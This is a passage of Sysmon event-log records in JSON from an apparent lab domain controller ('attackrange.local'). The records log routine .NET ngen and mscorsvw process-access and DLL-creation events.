277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7995,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:20.700\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1340-5F25-0000-001061740D00}\r\nTargetProcessId: 4116\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:20.700","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1340-5F25-0000-001061740D00}","TargetProcessId":"4116","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7996,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:20.716\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1340-5F25-0000-001061740D00}\r\nTargetProcessId: 4116\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:20.716","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1340-5F25-0000-001061740D00}","TargetProcessId":"4116","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7997,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:20.778\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-133B-5F25-0000-001060BA0C00}\r\nTargetProcessId: 2616\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:20.778","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-133B-5F25-0000-001060BA0C00}","TargetProcessId":"2616","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7998,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:20.778\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-133B-5F25-0000-001060BA0C00}\r\nTargetProcessId: 2616\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:20.778","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-133B-5F25-0000-001060BA0C00}","TargetProcessId":"2616","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7999,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:20.778\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-133B-5F25-0000-001060BA0C00}\r\nTargetProcessId: 2616\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:20.778","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-133B-5F25-0000-001060BA0C00}","TargetProcessId":"2616","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8000,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:01:20.825\r\nProcessGuid: {E2A3D6B1-1340-5F25-0000-0010D2770D00}\r\nProcessId: 2616\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\a38-0\\PresentationFramework-SystemDrawing.dll\r\nCreationUtcTime: 2020-08-01 07:01:20.825","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:01:20.825","ProcessGuid":"{E2A3D6B1-1340-5F25-0000-0010D2770D00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\a38-0\\PresentationFramework-SystemDrawing.dll","CreationUtcTime":"2020-08-01 07:01:20.825","EventReceivedTime":"2020-08-01 07:01:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8001,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:20.856\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1340-5F25-0000-00104C7C0D00}\r\nTargetProcessId: 2948\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:20.856","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1340-5F25-0000-00104C7C0D00}","TargetProcessId":"2948","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8002,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:20.856\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1340-5F25-0000-00104C7C0D00}\r\nTargetProcessId: 2948\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:20.856","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1340-5F25-0000-00104C7C0D00}","TargetProcessId":"2948","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8003,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:20.856\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1340-5F25-0000-00104C7C0D00}\r\nTargetProcessId: 2948\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:20.856","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1340-5F25-0000-00104C7C0D00}","TargetProcessId":"2948","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
